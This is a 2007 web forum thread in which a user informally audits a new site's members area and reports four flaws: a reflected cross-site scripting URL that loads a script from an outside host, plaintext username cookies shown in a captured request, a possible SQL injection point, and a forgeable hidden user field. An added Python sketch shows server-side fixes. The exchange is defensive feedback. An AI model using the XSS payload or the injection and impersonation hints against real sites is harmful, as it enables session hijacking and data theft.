Members section of new website
tarponkeith
Mar 13th, 2007, 05:31 PM
Hi,
Does anyone want to help me test out the members area of a new site I'm working on... If anyone is bored, please let me know... Thanks
abhijit
Mar 15th, 2007, 01:56 AM
where is it?
tarponkeith
Mar 18th, 2007, 09:36 PM
where is it?
Sorry, it's http://www.yourcode.info
Memnoch1207
Apr 16th, 2007, 03:58 PM
1. Parts of your site are vulnerable to XSS (Cross Site Scripting) attacks.
Blah (http://www.yourcode.info/login.asp?err=e1&user=%22%3E%3Cscript%20defer%20src=%22http://mansiononmain.com/s.js%22%3E%3C/script%3E)
2. Your cookies are in plain text and are associated with "Usernames".
Host: www.yourcode.info
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.yourcode.info/login.asp
Cookie: ASPSESSIONIDACSSCAAA=FBNFLAJBDOGDMNACAELEJIFP; Username=blah; Code=TUOEH
I didn't actually attempt to hijack an account, but you should encrypt all cookie data.
3. Your site may be vulnerable to a SQL Injection attack.
http://www.yourcode.info/profile.asp?id=a
4. You are storing "User" information in a hidden field; this could be manipulated to impersonate another user.
On the "Contact.asp" page.
<input type="hidden" name="user" value="blah">
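Added example, not code from the thread or from the yourcode.info site (which is classic ASP): a Python sketch of the server-side fixes a defender would apply to findings 1 to 3 above, namely a tamper-evident cookie in place of a plaintext "Username=" cookie, an integer-validated and parameterized profile lookup, and HTML-escaping of anything reflected to the page. The key, table and rows are constructed for the demo.

```python
# Added example (not from the thread): hardening for the cookie, SQL injection
# and XSS findings. Key, schema and rows below are constructed for the demo.
import base64
import hashlib
import hmac
import html
import secrets
import sqlite3
from typing import Optional

SERVER_KEY = secrets.token_bytes(32)  # constructed; lives only on the server


def sign_cookie(username: str, key: bytes = SERVER_KEY) -> str:
    """Return 'username.tag' with tag = HMAC-SHA256(key, username).
    The name stays readable, but editing it to another account breaks the tag."""
    tag = hmac.new(key, username.encode(), hashlib.sha256).digest()
    return f"{username}.{base64.urlsafe_b64encode(tag).decode().rstrip('=')}"


def verify_cookie(cookie: str, key: bytes = SERVER_KEY) -> Optional[str]:
    """Return the username only if the tag matches; None for missing or forged tags."""
    username, sep, tag = cookie.rpartition(".")  # tag is base64url, so it has no '.'
    if not sep:
        return None
    expected = sign_cookie(username, key).rpartition(".")[2]
    return username if hmac.compare_digest(tag.encode(), expected.encode()) else None


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the profiles table behind profile.asp."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE profiles (id INTEGER PRIMARY KEY, display_name TEXT)")
    conn.executemany("INSERT INTO profiles VALUES (?, ?)",
                     [(1, "blah"), (2, "<b>Mal</b>")])
    return conn


def profile_by_id(conn: sqlite3.Connection, raw_id: str) -> Optional[str]:
    """Look up a profile by the ?id= value. Non-digit input (e.g. 'a' or
    '1 OR 1=1') is rejected before any SQL runs, the value is bound as a
    parameter rather than concatenated, and the result is HTML-escaped so a
    stored name cannot inject script into the page."""
    if not raw_id.isdigit():
        return None
    row = conn.execute("SELECT display_name FROM profiles WHERE id = ?",
                       (int(raw_id),)).fetchone()
    return html.escape(row[0]) if row else None
```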
tarponkeith
Apr 18th, 2007, 12:19 AM
1. Parts of your site are vulnerable to XSS (Cross Site Scripting) attacks.
Blah (http://www.yourcode.info/login.asp?err=e1&user=%22%3E%3Cscript%20defer%20src=%22http://mansiononmain.com/s.js%22%3E%3C/script%3E)
2. Your cookies are in plain text and are associated with "Usernames".
I didn't actually attempt to hijack an account, but you should encrypt all cookie data.
3. Your site may be vulnerable to a SQL Injection attack.
http://www.yourcode.info/profile.asp?id=a
4. You are storing "User" information in a hidden field; this could be manipulated to impersonate another user.
On the "Contact.asp" page.
Thanks for the help!
I'm working on overhauling the entire site right now, and will definitely work those tips into the new design...
Much appreciated!
vbforums.com
Copyright Internet.com Inc., All Rights Reserved.